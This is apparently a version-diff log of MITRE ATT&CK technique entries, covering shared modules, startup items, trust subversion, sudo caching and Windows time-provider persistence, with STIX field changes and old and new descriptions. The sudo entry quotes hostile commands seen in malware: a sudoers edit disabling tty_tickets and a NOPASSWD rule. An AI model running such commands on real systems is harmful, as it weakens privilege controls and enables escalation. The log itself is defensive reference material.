x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
external_references@r0wdy_. (2017, November 30). Service Recovery Parameters. Retrieved April 9, 2018.
external_referencesCAPEC-478
dictionary_item_removed
STIX FieldOld valueNew Value
external_referencesCAPEC-478
external_referencesMark Russinovich. (2019, June 28). Autoruns for Windows v13.96. Retrieved March 13, 2020.
values_changed
STIX FieldOld valueNew Value
modified2021-10-14 23:52:52.058000+00:002022-05-05 04:53:45.640000+00:00
external_references[1]['source_name']capecTweet Registry Perms Weakness
external_references[1]['url']https://capec.mitre.org/data/definitions/478.htmlhttps://twitter.com/r0wdy_/status/936365549553991680
external_references[2]['source_name']Registry Key Securityinsecure_reg_perms
external_references[2]['description']Microsoft. (2018, May 31). Registry Key Security and Access Rights. Retrieved March 16, 2017.Clément Labro. (2020, November 12). Windows RpcEptMapper Service Insecure Registry Permissions EoP. Retrieved August 25, 2021.
external_references[2]['url']https://docs.microsoft.com/en-us/windows/win32/sysinfo/registry-key-security-and-access-rights?redirectedfrom=MSDNhttps://itm4n.github.io/windows-registry-rpceptmapper-eop/
external_references[3]['source_name']malware_hides_serviceKansa Service related collectors
external_references[3]['description']Lawrence Abrams. (2004, September 10). How Malware hides and is installed as a Service. Retrieved August 30, 2021.Hull, D.. (2014, May 3). Kansa: Service related collectors and analysis. Retrieved October 10, 2019.
external_references[3]['url']https://www.bleepingcomputer.com/tutorials/how-malware-hides-as-a-service/https://trustedsignal.blogspot.com/2014/05/kansa-service-related-collectors-and.html
external_references[4]['source_name']Kansa Service related collectorsmalware_hides_service
external_references[4]['description']Hull, D.. (2014, May 3). Kansa: Service related collectors and analysis. Retrieved October 10, 2019.Lawrence Abrams. (2004, September 10). How Malware hides and is installed as a Service. Retrieved August 30, 2021.
external_references[4]['url']https://trustedsignal.blogspot.com/2014/05/kansa-service-related-collectors-and.htmlhttps://www.bleepingcomputer.com/tutorials/how-malware-hides-as-a-service/
external_references[5]['source_name']Tweet Registry Perms WeaknessAutoruns for Windows
external_references[5]['description']@r0wdy_. (2017, November 30). Service Recovery Parameters. Retrieved April 9, 2018.Mark Russinovich. (2019, June 28). Autoruns for Windows v13.96. Retrieved March 13, 2020.
external_references[5]['url']https://twitter.com/r0wdy_/status/936365549553991680https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns
external_references[6]['source_name']microsoft_services_registry_treeRegistry Key Security
external_references[6]['description']Microsoft. (2021, August 5). HKLM\SYSTEM\CurrentControlSet\Services Registry Tree. Retrieved August 25, 2021.Microsoft. (2018, May 31). Registry Key Security and Access Rights. Retrieved March 16, 2017.
external_references[6]['url']https://docs.microsoft.com/en-us/windows-hardware/drivers/install/hklm-system-currentcontrolset-services-registry-treehttps://docs.microsoft.com/en-us/windows/win32/sysinfo/registry-key-security-and-access-rights?redirectedfrom=MSDN
external_references[7]['source_name']insecure_reg_permsmicrosoft_services_registry_tree
external_references[7]['description']Clément Labro. (2020, November 12). Windows RpcEptMapper Service Insecure Registry Permissions EoP. Retrieved August 25, 2021.Microsoft. (2021, August 5). HKLM\SYSTEM\CurrentControlSet\Services Registry Tree. Retrieved August 25, 2021.
external_references[7]['url']https://itm4n.github.io/windows-registry-rpceptmapper-eop/https://docs.microsoft.com/en-us/windows-hardware/drivers/install/hklm-system-currentcontrolset-services-registry-tree
external_references[9]['source_name']Autoruns for Windowscapec
external_references[9]['url']https://docs.microsoft.com/en-us/sysinternals/downloads/autorunshttps://capec.mitre.org/data/definitions/478.html
x_mitre_data_sources[0]Windows Registry: Windows Registry Key ModificationCommand: Command Execution
x_mitre_data_sources[2]Service: Service MetadataWindows Registry: Windows Registry Key Modification
x_mitre_data_sources[3]Command: Command ExecutionService: Service Modification
x_mitre_defense_bypassed[0]Application controlApplication Control

[T1129] Shared Modules

Current version: 2.1


Old Description
New Description
t1Adversaries may execute malicious payloads via loading sharet1Adversaries may execute malicious payloads via loading share
>d modules. The Windows module loader can be instructed to lo>d modules. The Windows module loader can be instructed to lo
>ad DLLs from arbitrary local paths and arbitrary Universal N>ad DLLs from arbitrary local paths and arbitrary Universal N
>aming Convention (UNC) network paths. This functionality res>aming Convention (UNC) network paths. This functionality res
>ides in NTDLL.dll and is part of the Windows [Native API](ht>ides in NTDLL.dll and is part of the Windows [Native API](ht
>tps://attack.mitre.org/techniques/T1106) which is called fro>tps://attack.mitre.org/techniques/T1106) which is called fro
>m functions like <code>CreateProcess</code>, <code>LoadLibra>m functions like <code>CreateProcess</code>, <code>LoadLibra
>ry</code>, etc. of the Win32 API. (Citation: Wikipedia Windo>ry</code>, etc. of the Win32 API.(Citation: Wikipedia Window
>ws Library Files)  The module loader can load DLLs:  * via s>s Library Files)  The module loader can load DLLs:  * via sp
>pecification of the (fully-qualified or relative) DLL pathna>ecification of the (fully-qualified or relative) DLL pathnam
>me in the IMPORT directory;      * via EXPORT forwarded to a>e in the IMPORT directory;      * via EXPORT forwarded to an
>nother DLL, specified with (fully-qualified or relative) pat>other DLL, specified with (fully-qualified or relative) path
>hname (but without extension);      * via an NTFS junction o>name (but without extension);      * via an NTFS junction or
>r symlink program.exe.local with the fully-qualified or rela> symlink program.exe.local with the fully-qualified or relat
>tive pathname of a directory containing the DLLs specified i>ive pathname of a directory containing the DLLs specified in
>n the IMPORT directory or forwarded EXPORTs;      * via <cod> the IMPORT directory or forwarded EXPORTs;      * via <code
>e>&#x3c;file name="filename.extension" loadFrom="fully-quali>>&#x3c;file name="filename.extension" loadFrom="fully-qualif
>fied or relative pathname"&#x3e;</code> in an embedded or ex>ied or relative pathname"&#x3e;</code> in an embedded or ext
>ternal "application manifest". The file name refers to an en>ernal "application manifest". The file name refers to an ent
>try in the IMPORT directory or a forwarded EXPORT.  Adversar>ry in the IMPORT directory or a forwarded EXPORT.  Adversari
>ies may use this functionality as a way to execute arbitrary>es may use this functionality as a way to execute arbitrary 
> payloads on a victim system. For example, malware may execu>payloads on a victim system. For example, malware may execut
>te share modules to load additional components or features.>e share modules to load additional components or features.
Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_remote_supportFalse
dictionary_item_removed
STIX FieldOld valueNew Value
x_mitre_permissions_required['User']
values_changed
STIX FieldOld valueNew Value
modified2021-10-15 13:48:02.963000+00:002022-04-19 20:31:10.657000+00:00
descriptionAdversaries may execute malicious payloads via loading shared modules. The Windows module loader can be instructed to load DLLs from arbitrary local paths and arbitrary Universal Naming Convention (UNC) network paths. This functionality resides in NTDLL.dll and is part of the Windows [Native API](https://attack.mitre.org/techniques/T1106) which is called from functions like CreateProcess, LoadLibrary, etc. of the Win32 API. (Citation: Wikipedia Windows Library Files) The module loader can load DLLs: * via specification of the (fully-qualified or relative) DLL pathname in the IMPORT directory; * via EXPORT forwarded to another DLL, specified with (fully-qualified or relative) pathname (but without extension); * via an NTFS junction or symlink program.exe.local with the fully-qualified or relative pathname of a directory containing the DLLs specified in the IMPORT directory or forwarded EXPORTs; * via <file name="filename.extension" loadFrom="fully-qualified or relative pathname"> in an embedded or external "application manifest". The file name refers to an entry in the IMPORT directory or a forwarded EXPORT. Adversaries may use this functionality as a way to execute arbitrary payloads on a victim system. For example, malware may execute share modules to load additional components or features.Adversaries may execute malicious payloads via loading shared modules. The Windows module loader can be instructed to load DLLs from arbitrary local paths and arbitrary Universal Naming Convention (UNC) network paths. This functionality resides in NTDLL.dll and is part of the Windows [Native API](https://attack.mitre.org/techniques/T1106) which is called from functions like CreateProcess, LoadLibrary, etc. of the Win32 API.(Citation: Wikipedia Windows Library Files) The module loader can load DLLs: * via specification of the (fully-qualified or relative) DLL pathname in the IMPORT directory; * via EXPORT forwarded to another DLL, specified with (fully-qualified or relative) pathname (but without extension); * via an NTFS junction or symlink program.exe.local with the fully-qualified or relative pathname of a directory containing the DLLs specified in the IMPORT directory or forwarded EXPORTs; * via <file name="filename.extension" loadFrom="fully-qualified or relative pathname"> in an embedded or external "application manifest". The file name refers to an entry in the IMPORT directory or a forwarded EXPORT. Adversaries may use this functionality as a way to execute arbitrary payloads on a victim system. For example, malware may execute share modules to load additional components or features.

[T1518] Software Discovery

Current version: 1.3

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
modified2021-03-29 16:05:00.456000+00:002022-01-29 00:02:24.150000+00:00
x_mitre_data_sources[3]Process: Process CreationProcess: OS API Execution
iterable_item_added
STIX FieldOld valueNew Value
x_mitre_data_sourcesProcess: Process Creation
iterable_item_removed
STIX FieldOld valueNew Value
x_mitre_data_sourcesProcess: OS API Execution

[T1037.005] Boot or Logon Initialization Scripts: Startup Items

Current version: 1.0


Old Description
New Description
t1Adversaries may use startup items automatically executed at t1Adversaries may use startup items automatically executed at 
>boot initialization to establish persistence. Startup items >boot initialization to establish persistence. Startup items 
>execute during the final phase of the boot process and conta>execute during the final phase of the boot process and conta
>in shell scripts or other executable files along with config>in shell scripts or other executable files along with config
>uration information used by the system to determine the exec>uration information used by the system to determine the exec
>ution order for all startup items. (Citation: Startup Items)>ution order for all startup items.(Citation: Startup Items) 
>  This is technically a deprecated technology (superseded by> This is technically a deprecated technology (superseded by 
> [Launch Daemon](https://attack.mitre.org/techniques/T1543/0>[Launch Daemon](https://attack.mitre.org/techniques/T1543/00
>04)), and thus the appropriate folder, <code>/Library/Startu>4)), and thus the appropriate folder, <code>/Library/Startup
>pItems</code> isn’t guaranteed to exist on the system by def>Items</code> isn’t guaranteed to exist on the system by defa
>ault, but does appear to exist by default on macOS Sierra. A>ult, but does appear to exist by default on macOS Sierra. A 
> startup item is a directory whose executable and configurat>startup item is a directory whose executable and configurati
>ion property list (plist), <code>StartupParameters.plist</co>on property list (plist), <code>StartupParameters.plist</cod
>de>, reside in the top-level directory.   An adversary can c>e>, reside in the top-level directory.   An adversary can cr
>reate the appropriate folders/files in the StartupItems dire>eate the appropriate folders/files in the StartupItems direc
>ctory to register their own persistence mechanism (Citation:>tory to register their own persistence mechanism.(Citation: 
> Methods of Mac Malware Persistence). Additionally, since St>Methods of Mac Malware Persistence) Additionally, since Star
>artupItems run during the bootup phase of macOS, they will r>tupItems run during the bootup phase of macOS, they will run
>un as the elevated root user.> as the elevated root user.
Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
modified2020-03-24 23:47:39.124000+00:002022-04-20 16:43:21.560000+00:00
descriptionAdversaries may use startup items automatically executed at boot initialization to establish persistence. Startup items execute during the final phase of the boot process and contain shell scripts or other executable files along with configuration information used by the system to determine the execution order for all startup items. (Citation: Startup Items) This is technically a deprecated technology (superseded by [Launch Daemon](https://attack.mitre.org/techniques/T1543/004)), and thus the appropriate folder, /Library/StartupItems isn’t guaranteed to exist on the system by default, but does appear to exist by default on macOS Sierra. A startup item is a directory whose executable and configuration property list (plist), StartupParameters.plist, reside in the top-level directory. An adversary can create the appropriate folders/files in the StartupItems directory to register their own persistence mechanism (Citation: Methods of Mac Malware Persistence). Additionally, since StartupItems run during the bootup phase of macOS, they will run as the elevated root user.Adversaries may use startup items automatically executed at boot initialization to establish persistence. Startup items execute during the final phase of the boot process and contain shell scripts or other executable files along with configuration information used by the system to determine the execution order for all startup items.(Citation: Startup Items) This is technically a deprecated technology (superseded by [Launch Daemon](https://attack.mitre.org/techniques/T1543/004)), and thus the appropriate folder, /Library/StartupItems isn’t guaranteed to exist on the system by default, but does appear to exist by default on macOS Sierra. A startup item is a directory whose executable and configuration property list (plist), StartupParameters.plist, reside in the top-level directory. An adversary can create the appropriate folders/files in the StartupItems directory to register their own persistence mechanism.(Citation: Methods of Mac Malware Persistence) Additionally, since StartupItems run during the bootup phase of macOS, they will run as the elevated root user.
x_mitre_data_sources[2]File: File ModificationCommand: Command Execution
iterable_item_added
STIX FieldOld valueNew Value
x_mitre_data_sourcesFile: File Modification
iterable_item_removed
STIX FieldOld valueNew Value
x_mitre_data_sourcesCommand: Command Execution

[T1553] Subvert Trust Controls

Current version: 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
modified2021-10-14 21:18:32.225000+00:002022-05-05 05:04:52.387000+00:00
external_references[1]['source_name']SpectorOps Subverting Trust Sept 2017SpectorOps Code Signing Dec 2017
external_references[1]['description']Graeber, M. (2017, September). Subverting Trust in Windows. Retrieved January 31, 2018.Graeber, M. (2017, December 22). Code Signing Certificate Cloning Attacks and Defenses. Retrieved April 3, 2018.
external_references[1]['url']https://specterops.io/assets/resources/SpecterOps_Subverting_Trust_in_Windows.pdfhttps://posts.specterops.io/code-signing-certificate-cloning-attacks-and-defenses-6f98657fc6ec
external_references[2]['source_name']Securelist Digital CertificatesSpectorOps Subverting Trust Sept 2017
external_references[2]['description']Ladikov, A. (2015, January 29). Why You Shouldn’t Completely Trust Files Signed with Digital Certificates. Retrieved March 31, 2016.Graeber, M. (2017, September). Subverting Trust in Windows. Retrieved January 31, 2018.
external_references[2]['url']https://securelist.com/why-you-shouldnt-completely-trust-files-signed-with-digital-certificates/68593/https://specterops.io/assets/resources/SpecterOps_Subverting_Trust_in_Windows.pdf
external_references[3]['source_name']Symantec Digital CertificatesSecurelist Digital Certificates
external_references[3]['description']Shinotsuka, H. (2013, February 22). How Attackers Steal Private Keys from Digital Certificates. Retrieved March 31, 2016.Ladikov, A. (2015, January 29). Why You Shouldn’t Completely Trust Files Signed with Digital Certificates. Retrieved March 31, 2016.
external_references[3]['url']http://www.symantec.com/connect/blogs/how-attackers-steal-private-keys-digital-certificateshttps://securelist.com/why-you-shouldnt-completely-trust-files-signed-with-digital-certificates/68593/
external_references[4]['source_name']SpectorOps Code Signing Dec 2017Symantec Digital Certificates
external_references[4]['description']Graeber, M. (2017, December 22). Code Signing Certificate Cloning Attacks and Defenses. Retrieved April 3, 2018.Shinotsuka, H. (2013, February 22). How Attackers Steal Private Keys from Digital Certificates. Retrieved March 31, 2016.
external_references[4]['url']https://posts.specterops.io/code-signing-certificate-cloning-attacks-and-defenses-6f98657fc6echttp://www.symantec.com/connect/blogs/how-attackers-steal-private-keys-digital-certificates
x_mitre_data_sources[0]Windows Registry: Windows Registry Key CreationCommand: Command Execution
x_mitre_data_sources[1]Windows Registry: Windows Registry Key ModificationWindows Registry: Windows Registry Key Creation
x_mitre_data_sources[3]Command: Command ExecutionFile: File Modification
x_mitre_data_sources[5]File: File ModificationModule: Module Load
x_mitre_data_sources[6]Module: Module LoadWindows Registry: Windows Registry Key Modification
iterable_item_added
STIX FieldOld valueNew Value
x_mitre_defense_bypassedApplication Control
iterable_item_removed
STIX FieldOld valueNew Value
x_mitre_defense_bypassedApplication control
x_mitre_defense_bypassedProcess whitelisting

[T1548.003] Abuse Elevation Control Mechanism: Sudo and Sudo Caching

Current version: 1.0


Old Description
New Description
t1Adversaries may perform sudo caching and/or use the suoders t1Adversaries may perform sudo caching and/or use the sudoers 
>file to elevate privileges. Adversaries may do this to execu>file to elevate privileges. Adversaries may do this to execu
>te commands as other users or spawn processes with higher pr>te commands as other users or spawn processes with higher pr
>ivileges.  Within Linux and MacOS systems, sudo (sometimes r>ivileges.  Within Linux and MacOS systems, sudo (sometimes r
>eferred to as "superuser do") allows users to perform comman>eferred to as "superuser do") allows users to perform comman
>ds from terminals with elevated privileges and to control wh>ds from terminals with elevated privileges and to control wh
>o can perform these commands on the system. The <code>sudo</>o can perform these commands on the system. The <code>sudo</
>code> command "allows a system administrator to delegate aut>code> command "allows a system administrator to delegate aut
>hority to give certain users (or groups of users) the abilit>hority to give certain users (or groups of users) the abilit
>y to run some (or all) commands as root or another user whil>y to run some (or all) commands as root or another user whil
>e providing an audit trail of the commands and their argumen>e providing an audit trail of the commands and their argumen
>ts."(Citation: sudo man page 2018) Since sudo was made for t>ts."(Citation: sudo man page 2018) Since sudo was made for t
>he system administrator, it has some useful configuration fe>he system administrator, it has some useful configuration fe
>atures such as a <code>timestamp_timeout</code>, which is th>atures such as a <code>timestamp_timeout</code>, which is th
>e amount of time in minutes between instances of <code>sudo<>e amount of time in minutes between instances of <code>sudo<
>/code> before it will re-prompt for a password. This is beca>/code> before it will re-prompt for a password. This is beca
>use <code>sudo</code> has the ability to cache credentials f>use <code>sudo</code> has the ability to cache credentials f
>or a period of time. Sudo creates (or touches) a file at <co>or a period of time. Sudo creates (or touches) a file at <co
>de>/var/db/sudo</code> with a timestamp of when sudo was las>de>/var/db/sudo</code> with a timestamp of when sudo was las
>t run to determine this timeout. Additionally, there is a <c>t run to determine this timeout. Additionally, there is a <c
>ode>tty_tickets</code> variable that treats each new tty (te>ode>tty_tickets</code> variable that treats each new tty (te
>rminal session) in isolation. This means that, for example, >rminal session) in isolation. This means that, for example, 
>the sudo timeout of one tty will not affect another tty (you>the sudo timeout of one tty will not affect another tty (you
> will have to type the password again).  The sudoers file, <> will have to type the password again).  The sudoers file, <
>code>/etc/sudoers</code>, describes which users can run whic>code>/etc/sudoers</code>, describes which users can run whic
>h commands and from which terminals. This also describes whi>h commands and from which terminals. This also describes whi
>ch commands users can run as other users or groups. This pro>ch commands users can run as other users or groups. This pro
>vides the principle of least privilege such that users are r>vides the principle of least privilege such that users are r
>unning in their lowest possible permissions for most of the >unning in their lowest possible permissions for most of the 
>time and only elevate to other users or permissions as neede>time and only elevate to other users or permissions as neede
>d, typically by prompting for a password. However, the sudoe>d, typically by prompting for a password. However, the sudoe
>rs file can also specify when to not prompt users for passwo>rs file can also specify when to not prompt users for passwo
>rds with a line like <code>user1 ALL=(ALL) NOPASSWD: ALL</co>rds with a line like <code>user1 ALL=(ALL) NOPASSWD: ALL</co
>de> (Citation: OSX.Dok Malware). Elevated privileges are req>de>.(Citation: OSX.Dok Malware) Elevated privileges are requ
>uired to edit this file though Adversaries can also abuse >ired to edit this file though Adversaries can also abuse p
>poor configurations of these mechanisms to escalate privileg>oor configurations of these mechanisms to escalate privilege
>es without needing the user's password. For example, <code>/>without needing the user's password. For example, <code>/v
>var/db/sudo</code>'s timestamp can be monitored to see if it>ar/db/sudo</code>'s timestamp can be monitored to see if it 
> falls within the <code>timestamp_timeout</code> range. If i>falls within the <code>timestamp_timeout</code> range. If it
>t does, then malware can execute sudo commands without needi> does, then malware can execute sudo commands without needin
>ng to supply the user's password. Additional, if <code>tty_t>g to supply the user's password. Additional, if <code>tty_ti
>ickets</code> is disabled, adversaries can do this from any >ckets</code> is disabled, adversaries can do this from any t
>tty for that user.  In the wild, malware has disabled <code>>ty for that user.  In the wild, malware has disabled <code>t
>tty_tickets</code> to potentially make scripting easier by i>ty_tickets</code> to potentially make scripting easier by is
>ssuing <code>echo \'Defaults !tty_tickets\' >> /etc/sudoers<>suing <code>echo \'Defaults !tty_tickets\' >> /etc/sudoers</
>/code> (Citation: cybereason osx proton). In order for this >code>.(Citation: cybereason osx proton) In order for this ch
>change to be reflected, the malware also issued <code>killal>ange to be reflected, the malware also issued <code>killall 
>l Terminal</code>. As of macOS Sierra, the sudoers file has >Terminal</code>. As of macOS Sierra, the sudoers file has <c
><code>tty_tickets</code> enabled by default.>ode>tty_tickets</code> enabled by default.
Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
modified2020-03-27 01:03:26.306000+00:002022-03-14 16:28:19.781000+00:00
descriptionAdversaries may perform sudo caching and/or use the suoders file to elevate privileges. Adversaries may do this to execute commands as other users or spawn processes with higher privileges. Within Linux and MacOS systems, sudo (sometimes referred to as "superuser do") allows users to perform commands from terminals with elevated privileges and to control who can perform these commands on the system. The sudo command "allows a system administrator to delegate authority to give certain users (or groups of users) the ability to run some (or all) commands as root or another user while providing an audit trail of the commands and their arguments."(Citation: sudo man page 2018) Since sudo was made for the system administrator, it has some useful configuration features such as a timestamp_timeout, which is the amount of time in minutes between instances of sudo before it will re-prompt for a password. This is because sudo has the ability to cache credentials for a period of time. Sudo creates (or touches) a file at /var/db/sudo with a timestamp of when sudo was last run to determine this timeout. Additionally, there is a tty_tickets variable that treats each new tty (terminal session) in isolation. This means that, for example, the sudo timeout of one tty will not affect another tty (you will have to type the password again). The sudoers file, /etc/sudoers, describes which users can run which commands and from which terminals. This also describes which commands users can run as other users or groups. This provides the principle of least privilege such that users are running in their lowest possible permissions for most of the time and only elevate to other users or permissions as needed, typically by prompting for a password. However, the sudoers file can also specify when to not prompt users for passwords with a line like user1 ALL=(ALL) NOPASSWD: ALL (Citation: OSX.Dok Malware). Elevated privileges are required to edit this file though. Adversaries can also abuse poor configurations of these mechanisms to escalate privileges without needing the user's password. For example, /var/db/sudo's timestamp can be monitored to see if it falls within the timestamp_timeout range. If it does, then malware can execute sudo commands without needing to supply the user's password. Additional, if tty_tickets is disabled, adversaries can do this from any tty for that user. In the wild, malware has disabled tty_tickets to potentially make scripting easier by issuing echo \'Defaults !tty_tickets\' >> /etc/sudoers (Citation: cybereason osx proton). In order for this change to be reflected, the malware also issued killall Terminal. As of macOS Sierra, the sudoers file has tty_tickets enabled by default.Adversaries may perform sudo caching and/or use the sudoers file to elevate privileges. Adversaries may do this to execute commands as other users or spawn processes with higher privileges. Within Linux and MacOS systems, sudo (sometimes referred to as "superuser do") allows users to perform commands from terminals with elevated privileges and to control who can perform these commands on the system. The sudo command "allows a system administrator to delegate authority to give certain users (or groups of users) the ability to run some (or all) commands as root or another user while providing an audit trail of the commands and their arguments."(Citation: sudo man page 2018) Since sudo was made for the system administrator, it has some useful configuration features such as a timestamp_timeout, which is the amount of time in minutes between instances of sudo before it will re-prompt for a password. This is because sudo has the ability to cache credentials for a period of time. Sudo creates (or touches) a file at /var/db/sudo with a timestamp of when sudo was last run to determine this timeout. Additionally, there is a tty_tickets variable that treats each new tty (terminal session) in isolation. This means that, for example, the sudo timeout of one tty will not affect another tty (you will have to type the password again). The sudoers file, /etc/sudoers, describes which users can run which commands and from which terminals. This also describes which commands users can run as other users or groups. This provides the principle of least privilege such that users are running in their lowest possible permissions for most of the time and only elevate to other users or permissions as needed, typically by prompting for a password. However, the sudoers file can also specify when to not prompt users for passwords with a line like user1 ALL=(ALL) NOPASSWD: ALL.(Citation: OSX.Dok Malware) Elevated privileges are required to edit this file though. Adversaries can also abuse poor configurations of these mechanisms to escalate privileges without needing the user's password. For example, /var/db/sudo's timestamp can be monitored to see if it falls within the timestamp_timeout range. If it does, then malware can execute sudo commands without needing to supply the user's password. Additional, if tty_tickets is disabled, adversaries can do this from any tty for that user. In the wild, malware has disabled tty_tickets to potentially make scripting easier by issuing echo \'Defaults !tty_tickets\' >> /etc/sudoers.(Citation: cybereason osx proton) In order for this change to be reflected, the malware also issued killall Terminal. As of macOS Sierra, the sudoers file has tty_tickets enabled by default.
x_mitre_data_sources[0]Process: Process MetadataFile: File Modification
x_mitre_data_sources[1]Process: Process CreationCommand: Command Execution
x_mitre_data_sources[2]Command: Command ExecutionProcess: Process Metadata
x_mitre_data_sources[3]File: File ModificationProcess: Process Creation

[T1033] System Owner/User Discovery

Current version: 1.3

New Detections:

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
dictionary_item_removed
STIX FieldOld valueNew Value
x_mitre_permissions_required['User', 'Administrator']
values_changed
STIX FieldOld valueNew Value
modified2021-08-12 13:34:34.153000+00:002022-04-20 19:04:03.271000+00:00
x_mitre_data_sources[0]Process: Process CreationActive Directory: Active Directory Object Access
x_mitre_data_sources[1]Command: Command ExecutionProcess: OS API Execution
iterable_item_added
STIX FieldOld valueNew Value
x_mitre_data_sourcesFile: File Access
x_mitre_data_sourcesNetwork Traffic: Network Traffic Content
x_mitre_data_sourcesProcess: Process Access
x_mitre_data_sourcesWindows Registry: Windows Registry Key Access
x_mitre_data_sourcesNetwork Traffic: Network Traffic Flow
x_mitre_data_sourcesCommand: Command Execution
x_mitre_data_sourcesProcess: Process Creation

[T1547.003] Boot or Logon Autostart Execution: Time Providers

Current version: 1.0


Old Description
New Description
t1Adversaries may abuse time providers to execute DLLs when tht1Adversaries may abuse time providers to execute DLLs when th
>e system boots. The Windows Time service (W32Time) enables t>e system boots. The Windows Time service (W32Time) enables t
>ime synchronization across and within domains. (Citation: Mi>ime synchronization across and within domains.(Citation: Mic
>crosoft W32Time Feb 2018) W32Time time providers are respons>rosoft W32Time Feb 2018) W32Time time providers are responsi
>ible for retrieving time stamps from hardware/network resour>ble for retrieving time stamps from hardware/network resourc
>ces and outputting these values to other network clients. (C>es and outputting these values to other network clients.(Cit
>itation: Microsoft TimeProvider)  Time providers are impleme>ation: Microsoft TimeProvider)  Time providers are implement
>nted as dynamic-link libraries (DLLs) that are registered in>ed as dynamic-link libraries (DLLs) that are registered in t
> the subkeys of  <code>HKEY_LOCAL_MACHINE\System\CurrentCont>he subkeys of  <code>HKEY_LOCAL_MACHINE\System\CurrentContro
>rolSet\Services\W32Time\TimeProviders\</code>. (Citation: Mi>lSet\Services\W32Time\TimeProviders\</code>.(Citation: Micro
>crosoft TimeProvider) The time provider manager, directed by>soft TimeProvider) The time provider manager, directed by th
> the service control manager, loads and starts time provider>e service control manager, loads and starts time providers l
>s listed and enabled under this key at system startup and/or>isted and enabled under this key at system startup and/or wh
> whenever parameters are changed. (Citation: Microsoft TimeP>enever parameters are changed.(Citation: Microsoft TimeProvi
>rovider)  Adversaries may abuse this architecture to establi>der)  Adversaries may abuse this architecture to establish p
>sh persistence, specifically by registering and enabling a m>ersistence, specifically by registering and enabling a malic
>alicious DLL as a time provider. Administrator privileges ar>ious DLL as a time provider. Administrator privileges are re
>e required for time provider registration, though execution >quired for time provider registration, though execution will
>will run in context of the Local Service account. (Citation:> run in context of the Local Service account.(Citation: Gith
> Github W32Time Oct 2017)>ub W32Time Oct 2017)
Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
modified2020-03-25 15:24:26.476000+00:002022-04-20 16:31:16.715000+00:00
descriptionAdversaries may abuse time providers to execute DLLs when the system boots. The Windows Time service (W32Time) enables time synchronization across and within domains. (Citation: Microsoft W32Time Feb 2018) W32Time time providers are responsible for retrieving time stamps from hardware/network resources and outputting these values to other network clients. (Citation: Microsoft TimeProvider) Time providers are implemented as dynamic-link libraries (DLLs) that are registered in the subkeys of HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\W32Time\TimeProviders\. (Citation: Microsoft TimeProvider) The time provider manager, directed by the service control manager, loads and starts time providers listed and enabled under this key at system startup and/or whenever parameters are changed. (Citation: Microsoft TimeProvider) Adversaries may abuse this architecture to establish persistence, specifically by registering and enabling a malicious DLL as a time provider. Administrator privileges are required for time provider registration, though execution will run in context of the Local Service account. (Citation: Github W32Time Oct 2017)Adversaries may abuse time providers to execute DLLs when the system boots. The Windows Time service (W32Time) enables time synchronization across and within domains.(Citation: Microsoft W32Time Feb 2018) W32Time time providers are responsible for retrieving time stamps from hardware/network resources and outputting these values to other network clients.(Citation: Microsoft TimeProvider) Time providers are implemented as dynamic-link libraries (DLLs) that are registered in the subkeys of HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\W32Time\TimeProviders\.(Citation: Microsoft TimeProvider) The time provider manager, directed by the service control manager, loads and starts time providers listed and enabled under this key at system startup and/or whenever parameters are changed.(Citation: Microsoft TimeProvider) Adversaries may abuse this architecture to establish persistence, specifically by registering and enabling a malicious DLL as a time provider. Administrator privileges are required for time provider registration, though execution will run in context of the Local Service account.(Citation: Github W32Time Oct 2017)
external_references[1]['source_name']Microsoft W32Time Feb 2018Github W32Time Oct 2017
external_references[1]['description']Microsoft. (2018, February 1). Windows Time Service (W32Time). Retrieved March 26, 2018.Lundgren, S. (2017, October 28). w32time. Retrieved March 26, 2018.
external_references[1]['url']https://docs.microsoft.com/windows-server/networking/windows-time-service/windows-time-service-tophttps://github.com/scottlundgren/w32time
external_references[2]['source_name']Microsoft TimeProviderMicrosoft W32Time May 2017
external_references[2]['description']Microsoft. (n.d.). Time Provider. Retrieved March 26, 2018.Mathers, B. (2017, May 31). Windows Time Service Tools and Settings. Retrieved March 26, 2018.
external_references[2]['url']https://msdn.microsoft.com/library/windows/desktop/ms725475.aspxhttps://docs.microsoft.com/windows-server/networking/windows-time-service/windows-time-service-tools-and-settings
external_references[3]['source_name']Github W32Time Oct 2017Microsoft W32Time Feb 2018
external_references[3]['description']Lundgren, S. (2017, October 28). w32time. Retrieved March 26, 2018.Microsoft. (2018, February 1). Windows Time Service (W32Time). Retrieved March 26, 2018.
external_references[3]['url']https://github.com/scottlundgren/w32timehttps://docs.microsoft.com/windows-server/networking/windows-time-service/windows-time-service-top
external_references[4]['source_name']Microsoft W32Time May 2017Microsoft TimeProvider
